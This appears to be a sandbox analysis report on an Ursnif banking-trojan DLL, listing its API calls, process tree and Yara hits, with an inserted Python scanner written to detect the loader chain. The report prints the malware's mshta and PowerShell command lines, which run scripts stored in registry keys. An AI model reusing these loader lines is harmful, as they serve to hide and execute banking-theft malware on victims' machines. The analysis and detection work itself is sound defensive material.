            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00448DAA NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,0_2_00448DAA
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00446F11 NtQuerySystemInformation,RtlNtStatusToDosError,0_2_00446F11
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB387C NtCreateSection,35_2_00FB387C
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB3830 NtWriteVirtualMemory,35_2_00FB3830
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB1AC4 NtQueryInformationProcess,35_2_00FB1AC4
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FABAB4 NtAllocateVirtualMemory,35_2_00FABAB4
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FACCA0 NtReadVirtualMemory,35_2_00FACCA0
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCADD4 NtQueryInformationProcess,35_2_00FCADD4
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FBF560 NtSetInformationProcess,CreateRemoteThread,TerminateThread,35_2_00FBF560
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,35_2_00FCF7EC
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FBFFCC NtMapViewOfSection,35_2_00FBFFCC
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC676C NtSetContextThread,NtUnmapViewOfSection,NtClose,35_2_00FC676C
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FE1002 NtProtectVirtualMemory,NtProtectVirtualMemory,35_2_00FE1002
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00442F65 CreateProcessAsUserW,0_2_00442F65
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_3_00432161
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_3_00431AE4
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_737522A4
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0047181A
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0045F9C9
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_004491D8
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0044A235
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_004562B9
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00447CF0
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00451481
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0045C53B
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0045BDD5
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0044DE6E
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00459F48
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00466F28
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FCC164
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FCA4BC
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FC676C
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FC20F8
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FCE080
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FC6064
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FBB040
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FA203C
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FC0034
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FC91A0
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FB1174
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FCF940
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FB9138
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FAC134
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FC8224
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FC3208
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FA2BC8
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FB9380
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FA8B5C
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FB8B4C
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FA7320
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FABCF8
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FB3CE0
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FC74CC
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FB0CC0
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FC94B8
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FB9CB0
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FBD4A8
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FAD460
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FB1D94
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FB452C
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FBB520
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FCB516
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FA6D08
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FC26B4
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FCBEB0
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FAAE04
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FA37B8
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FB17B8
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FCAFB8
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FA9F98
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FBF770
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FAB75C
            Source: jery0dbp.dll.31.dr | Static PE information: No import functions for PE file found
            Source: 1453igkk.dll.29.dr | Static PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: onecorecommonproxystub.dll
            Source: classification engine | Classification label: mal100.bank.troj.evad.winDLL@25/54@4/2
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00443861 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle
            Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
            Source: C:\Windows\System32\loaddll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{D2ACCE85-0966-D4B7-2326-4D4807BAD1FC}
            Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{C659AAB4-6D66-E894-275A-F19C4B2EB590}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{AABE5E0C-015E-6C1F-DB7E-C5603F92C994}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_01
            Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Temp\~DF9DD6CD76C3034B75.TMP
            Source: onerous.tar.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll (6 occurrences)
            Source: C:\Program Files\internet explorer\iexplore.exe | File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: onerous.tar.dll | Virustotal: Detection: 47%
            Source: onerous.tar.dll | ReversingLabs: Detection: 58%
            Source: loaddll32.exe | String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
            Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\onerous.tar.dll'
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7128 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17422 /prefetch:2
            Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP'
            Source: unknown | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7128 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17422 /prefetch:2
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP'
            Source: C:\Windows\explorer.exe | Process created: unknown unknown
            Source: C:\Windows\System32\control.exe | Process created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001D.00000002.386299480.000001E454AC0000.00000002.00000001.sdmp, csc.exe, 0000001F.00000002.393531014.00000252540B0000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000021.00000000.419495415.000000000E9C0000.00000002.00000001.sdmp
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.415714713.0000000003CB0000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.415714713.0000000003CB0000.00000004.00000001.sdmp
            Source: Binary string: rundll32.pdb source: control.exe, 00000023.00000002.853520403.0000011AB5EFC000.00000004.00000040.sdmp
            Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000023.00000002.853520403.0000011AB5EFC000.00000004.00000040.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000021.00000000.419495415.000000000E9C0000.00000002.00000001.sdmp

            Data Obfuscation:

            Suspicious powershell command line found
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0045735C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_3_0043AE32 push eax; iretd 0_3_0043AE33
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_3_0043AE34 push esi; iretd 0_3_0043AE35
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_3_00431AD3 push ecx; ret 0_3_00431AE3
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_3_00431A80 push ecx; ret 0_3_00431A89
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_3_0043AF92 push edx; iretd 0_3_0043AF93
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_73752240 push ecx; ret 0_2_73752249
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_73752293 push ecx; ret 0_2_737522A3
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0046B834 push cs; ret 0_2_0046B841
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0046BA9E push esp; ret 0_2_0046BAA1
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00466BB0 push ecx; ret 0_2_00466BB9
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00466F17 push ecx; ret 0_2_00466F27
            Source: C:\Windows\System32\control.exe | Code function: 35_2_00FA4DCD push 3B000001h; retf 35_2_00FA4DD2
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dll
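The process chain recorded above is a compact detection target: mshta.exe runs an inline HTA that RegRead()s a value under HKCU\Software\AppDataLow\Software\Microsoft\{GUID}, the PowerShell it spawns iex-es another value from the same key, PowerShell then drives csc.exe with a response file under %TEMP%, and the sample launches control.exe -h as an injection host. The scanner below is an added example written for this page, not part of the sandbox report: it evaluates those four conditions over process-creation events. The event layout (pid, ppid, image, cmdline) is an assumption in the style of Sysmon Event ID 1, and the sample events and PIDs are constructed to mirror the report's tree, with two benign controls added.

```python
"""Flag the registry-resident mshta -> powershell -> csc.exe loader chain.

Added example, not part of the sandbox report. Event fields (pid, ppid, image,
cmdline) are an assumed layout in the style of Sysmon Event ID 1; the sample
events and PIDs below are constructed to mirror the report's process tree.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # its command line


# Key family the sample stores its script and payload blobs under:
# HKCU\Software\AppDataLow\Software\Microsoft\{GUID}. Backslashes are doubled
# when the key sits inside an HTA/JScript string literal, and the PowerShell
# provider form is "HKCU:"; the pattern matches the key shape, not one GUID.
APPDATALOW_KEY = re.compile(
    r"HKCU[:\\]+Software\\+AppDataLow\\+Software\\+Microsoft\\+"
    r"[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}",
    re.IGNORECASE,
)
# iex / Invoke-Expression applied to something read with gp / Get-ItemProperty.
PS_IEX_FROM_REGISTRY = re.compile(
    r"(?:\biex\b|invoke-expression).*(?:\bgp\b|get-itemproperty)", re.IGNORECASE)
# csc.exe handed a response file (@file) that lives under the user's %TEMP%.
CSC_TEMP_RSP = re.compile(
    r"@.?[A-Z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\.*\.cmdline", re.IGNORECASE)

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased; works with Windows separators on any host."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return sorted (rule_name, pid) pairs for every event that matches a rule."""
    by_pid = {e.pid: e for e in events}
    findings = set()
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = basename(parent.image) if parent else ""

        # 1. mshta.exe spawning a shell (the HTA stage launching PowerShell).
        if name in SHELLS and parent_name == "mshta.exe":
            findings.add(("mshta_spawns_shell", e.pid))

        # 2. Script body pulled from the AppDataLow GUID key and executed inline,
        #    by mshta (WScript.Shell.RegRead) or by PowerShell (iex + gp).
        if APPDATALOW_KEY.search(e.cmdline) and (
            (name == "mshta.exe" and "regread" in e.cmdline.lower())
            or (name in SHELLS and PS_IEX_FROM_REGISTRY.search(e.cmdline))
        ):
            findings.add(("registry_stored_script", e.pid))

        # 3. A shell driving csc.exe with a response file under %TEMP%
        #    (Add-Type style on-the-fly compilation of the injector).
        if name == "csc.exe" and parent_name in SHELLS and CSC_TEMP_RSP.search(e.cmdline):
            findings.add(("csc_compiles_from_temp", e.pid))

        # 4. control.exe -h with a known parent other than explorer.exe; here the
        #    sample starts it from loaddll32.exe as an injection target.
        if (name == "control.exe" and re.search(r"\s-h\b", e.cmdline)
                and parent is not None and parent_name != "explorer.exe"):
            findings.add(("control_h_unusual_parent", e.pid))
    return sorted(findings)


# Constructed sample events modelled on the report's process tree (PIDs invented).
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\System32\loaddll32.exe",
              r"loaddll32.exe C:\Users\user\Desktop\onerous.tar.dll"),
    ProcEvent(1001, 1000, r"C:\Windows\System32\control.exe", r"C:\Windows\system32\control.exe -h"),
    ProcEvent(1002, 800, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell')"
              r".regread('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\Actidsrv'));"
              r"if(!window.flag)close()</script>"),
    ProcEvent(1003, 1002, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp "
              r"'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))"),
    ProcEvent(1004, 1003, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"csc.exe /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'"),
    ProcEvent(1005, 1004, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
              r"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"),
    # Benign controls: an interactive PowerShell and a developer build from a source tree.
    ProcEvent(2000, 800, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell.exe Get-Process"),
    ProcEvent(2001, 2000, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"csc.exe /out:C:\src\app\bin\app.exe C:\src\app\Program.cs"),
]


if __name__ == "__main__":
    lookup = {e.pid: e for e in SAMPLE_EVENTS}
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:26} pid={pid:<5} {lookup[pid].image}")
```

Rule 2 is the one worth keeping even if the others are tuned down: the GUID changes per infection, but the key shape and the read-then-execute idiom do not, and the WMI StdRegProv::SetStringValue writes listed earlier in this report are how those values get planted, so registry-set telemetry on the same key path complements the process-creation view.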

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara match | File source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 4672, type: MEMORY
            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY
            Source: C:\Windows\System32\loaddll32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
            Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (45 occurrences)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
